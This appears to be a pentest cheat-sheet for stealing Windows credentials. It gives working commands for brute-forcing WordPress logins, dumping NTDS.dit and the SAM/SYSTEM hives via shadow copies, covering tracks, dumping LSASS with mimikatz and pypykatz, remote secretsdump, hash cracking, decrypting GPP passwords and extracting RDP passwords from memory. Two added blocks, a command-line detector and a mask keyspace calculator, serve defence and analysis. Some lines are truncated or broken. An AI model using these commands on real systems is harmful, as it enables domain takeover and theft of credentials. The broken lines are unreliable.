Credential Theft

Generate a Password Wordlist


#Expand a base wordlist with the best64 rule set and write the candidates to stdout
hashcat --force --stdout pwdlist.txt -r /usr/share/hashcat/rules/best64.rule


hydra -l admin -P /usr/share/wordlists/rockyou.txt http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect'

Credential Stealing Cheat-Sheet

Volume Shadow Copy

These files are located at C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM, but they cannot be copied in the normal way because the running OS keeps them locked.

  • Requires DC compromise.

  • We need 2 files:

    • NTDS.dit

    • SYSTEM registry hive (stored in the registry under HKLM\SYSTEM)

  • The SYSTEM hive contains the Boot Key that is needed to decrypt the NTDS.dit file.

  • Reference: Stealthbits

#Remotely with DA clear-text password
wmic /node:<DC_hostname> /user:<domain\user> /password:<pass> process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log"
wmic /node:<DC_hostname> /user:<domain\user> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit 2>&1 > c:\vss2.log"
wmic /node:<DC_hostname> /user:<domain\user> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive 2>&1 > c:\vss3.log"

#Remotely with DA Pass-the-ticket
wmic /authority:"Kerberos:<domain\DC-hostname>" /node:<DC-Hostname> process call create  "..<Same as above>.."

#Remotely via PSRemote 
Powersploit's Invoke-NinjaCopy

#ntdsutil.exe: a built-in sysadmin tool; must be run on the DC.
#Creating an "install from media" (IFM) set copies NTDS.dit and the SYSTEM registry hive:
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

#Create a volume shadow copy
vssadmin create shadow /for=C:

#Retrieve Ntds.dit file from Volume Shadow Copy
copy <Shadow directory>\ntds.dit  c:\Temp\ntds.dit

#Copy SYSTEM & SAM Hive file from registry.
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak

#Delete tracks
vssadmin delete shadows /shadow={<Shadow Copy ID>}

#With DA privs, save NTDS.dit to C:\Temp
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
#Add -history to include password history; the same tool parses the SAM/SECURITY hives:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

#Remotely extract credentials
impacket-secretsdump <domain>/<username>:'<pass>'@<IP>
impacket-secretsdump -just-dc-ntlm offense/administrator@
#Create a file called cmd in C:\windows\temp\ with these contents (one directive per line):
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit

#Create a shadow volume accessible via H: by running the script
diskshadow /s cmd

#Upload SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll, then:
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

  • With SeBackupPrivilege, a backup of c:\windows\ntds can be taken and ntds.dit restored from it, bypassing the file ACLs. See the ACL Abuse section for details.


#Dump the memory of lsass.exe. In Task Manager (run as admin), right-click the process and choose "Create dump file"

#procdump is a Windows Sysinternals tool
procdump.exe -accepteula -ma lsass C:\Windows\Temp\lsass.dmp

#Extract using mimikatz
sekurlsa::minidump lsass.dmp

#Or parse the dump offline with pypykatz; the second line collects the unique NT hashes
pypykatz lsa minidump lsass.DMP
pypykatz lsa minidump lsass.DMP | grep 'NT:' | awk '{print $2}' | sort -u > hashes
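From the defender's side, every command in the Volume Shadow Copy section and the LSASS dump above leaves a distinctive process command line. The following is an added detection example (not part of the original cheat-sheet) that flags those patterns in process-creation telemetry. It assumes each event (for instance Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled) has already been flattened to one `image|command_line` record; the sample records are constructed for the demo and mirror the commands shown above.

```python
"""Flag the credential-theft command lines from the Volume Shadow Copy and
LSASS sections in process-creation telemetry.

Added example, not from the original cheat-sheet.  It assumes each event
(e.g. Sysmon Event ID 1 or Security 4688 with command-line auditing enabled)
has been flattened to one 'image|command_line' record; the records below
are constructed for the demo."""
import re

# Rule name -> pattern matched against the lower-cased command line.
RULES = [
    ("vss_shadow_create", re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b")),
    ("vss_shadow_delete", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b")),
    ("ntdsutil_ifm",      re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b")),
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\s")),
    ("shadow_copy_read",  re.compile(r"harddiskvolumeshadowcopy\d+\\.*\\(ntds\.dit|system)\b")),
    ("reg_save_hive",     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b")),
    ("lsass_dump",        re.compile(r"\bprocdump(64)?(\.exe)?\b.*\blsass\b")),
    ("sebackup_copy",     re.compile(r"copy-filesebackupprivilege")),
]


def classify(command_line):
    """Return the names of every rule that matches one command line."""
    lowered = command_line.lower()
    return [name for name, pattern in RULES if pattern.search(lowered)]


def scan(records):
    """Return (record_no, image, matched_rules) for each suspicious record."""
    hits = []
    for number, record in enumerate(records, 1):
        image, _, command_line = record.partition("|")
        matched = classify(command_line)
        if matched:
            hits.append((number, image.strip(), matched))
    return hits


# Constructed sample records: six mirror commands from the cheat-sheet, two are benign.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe|cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log",
    r"C:\Windows\System32\cmd.exe|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit",
    r'C:\Windows\System32\ntdsutil.exe|ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q',
    r"C:\Windows\System32\reg.exe|reg.exe save HKLM\SAM sam.bak",
    r"C:\Tools\procdump.exe|procdump.exe -accepteula -ma lsass C:\Windows\Temp\lsass.dmp",
    r"C:\Windows\System32\diskshadow.exe|diskshadow /s cmd",
    r"C:\Windows\System32\vssadmin.exe|vssadmin list shadows",
    r"C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for number, image, matched in scan(SAMPLE_EVENTS):
        print(f"record {number}: {image} -> {', '.join(matched)}")
```

The benign `vssadmin list shadows` record is deliberately left unmatched: shadow-copy listing is routine administration, whereas creation followed by a copy out of `HarddiskVolumeShadowCopy<n>` or a `reg save` of the SAM/SYSTEM hives is what the cheat-sheet relies on. In production the rules would be keyed on the parsed command-line field rather than a pipe-separated string, but the patterns carry over unchanged.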

Cracking Hashes

#Dictionary attack on NetNTLMv2 hashes (-m 5600)
hashcat -m 5600 hash_file rockyou.txt --force

#Brute-force - mask attack: custom charset 1 = lower+digit+upper, charset 2 = upper; the mask is one ?2 followed by six ?1
hashcat.exe -a 3 -m 5600 hashes.txt -1 ?l?d?u -2 ?u ?2?1?1?1?1?1?1 -o cracked.txt -O

#Rule-based attack; --debug-mode=1 records which rule cracked each hash in matched.rule
hashcat -m 5600 hash.txt rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule
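To judge how much a mask like the one above actually covers (and therefore whether a password policy is exposed to it), it helps to compute the keyspace from the custom charsets. The block below is an added example, not the cheat-sheet's or hashcat's own code; it expands `-1 ?l?d?u -2 ?u` and the mask `?2?1?1?1?1?1?1` into per-position character sets and multiplies them out. Built-in charset sizes follow hashcat's definitions. It generalizes beyond the page's single mask to any mask with literal characters and custom charsets; the guess rate used in the demo is an assumed figure.

```python
"""Keyspace of a hashcat mask with custom charsets (-1 .. -4).
Added example; not hashcat's own code.  Built-in charsets follow hashcat's
definitions (?l ?u ?d ?s ?a ?h ?H)."""
import string

BUILTIN = {
    "l": string.ascii_lowercase,                     # 26
    "u": string.ascii_uppercase,                     # 26
    "d": string.digits,                              # 10
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",      # 33 specials incl. space
    "h": "0123456789abcdef",                         # 16
    "H": "0123456789ABCDEF",                         # 16
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]  # 95


def expand_charset(spec, custom):
    """Expand a charset spec such as '?l?d?u' or 'abc?d' into a set of characters.
    `custom` maps '1'..'4' to already-expanded custom charsets; '??' is a literal '?'."""
    chars = set()
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                chars.add("?")
            elif key in custom:
                chars |= custom[key]
            elif key in BUILTIN:
                chars.update(BUILTIN[key])
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            chars.add(spec[i])
            i += 1
    return chars


def mask_positions(mask, custom):
    """Split a mask into one character set per password position."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append({mask[i]})
            i += 1
    return positions


def mask_keyspace(mask, custom_specs=None):
    """Return (total candidates, per-position charset sizes) for a mask.
    custom_specs maps '1'..'4' to their definitions, e.g. {'1': '?l?d?u', '2': '?u'}
    for `-1 ?l?d?u -2 ?u`; a custom charset may reference an earlier one."""
    custom = {}
    for key, spec in (custom_specs or {}).items():
        custom[key] = expand_charset(spec, custom)
    sizes = [len(p) for p in mask_positions(mask, custom)]
    total = 1
    for size in sizes:
        total *= size
    return total, sizes


def seconds_at_rate(keyspace, hashes_per_second):
    """Worst-case time to exhaust a keyspace at a given guess rate."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    # The mask from the cheat-sheet: one upper-case letter then six alphanumerics.
    total, sizes = mask_keyspace("?2?1?1?1?1?1?1", {"1": "?l?d?u", "2": "?u"})
    print(sizes, total)
    # Compare with a full 8-character printable mask (1e9/s is an assumed rate).
    full8, _ = mask_keyspace("?a" * 8)
    print(full8, "candidates;", seconds_at_rate(full8, 1e9) / 86400, "days at 1e9/s")
```

Because charsets are expanded into sets before counting, a definition such as `-1 ?l?l` is not double-counted, which matches how hashcat treats repeated characters in a custom charset.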

Hashes from Memory Dump

  1. Analyze the memory dump to identify the OS/profile

#Download from

#Identify profile
volatility -f memoryFile.dmp imageinfo

  2. Extract hashes from the memory dump

volatility -f memoryFile.dmp --profile Win2012R2x64 hashdump
#hashdump prints LM:NT pairs, so crack the NT part as NTLM (hashcat mode 1000)
hashcat.exe -m 1000 creds.txt wordlist.txt -O

Crack GPP Password

#Decrypt a GPP cpassword value (the AES key is public, so any cpassword is recoverable)
gpp-decrypt <cpassword>

#.DOCX file: extract the office hash, then crack it with john
python dummy.docx > hash.txt
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt

Credential Vault

Initializing the PasswordVault Object

#Load the Credentials and PasswordVault assemblies (a WinRT type, so it is loaded with ContentType=WindowsRuntime):
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]

#Instantiate an object of the PasswordVault class to work with:
$vault = New-Object Windows.Security.Credentials.PasswordVault

#Read contents of the vault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Passwords from RDP Sessions

Reference : Blog

Note: Tested only on Server 2012R2. [Failed on 2016]

  • Identify active RDP sessions

  • RDP hijack if necessary.

  • Identify the svchost process ID hosting the RDP service

  • Use Task Manager/procdump/Process Hacker to generate a dump of that svchost process.

  • Exfiltrate the dump file and search it with strings for the password.

  • The password is usually right below the username

#Run as admin: list active RDP sessions
query user

#Identify the svchost process ID hosting TermService
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1

#Dump process memory (Task Manager: right-click > Create dump file, or procdump with the PID found above)
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#Search the dump for the password (Linux strings or Sysinternals strings64.exe):
strings -el svchost* | grep Password123 -C3
. .\strings64.exe <Dump.dmp> | Select-String "Grepthis" -Context 3,3

#Mimikatz alternative:
privilege::debug
ts::logonpasswords
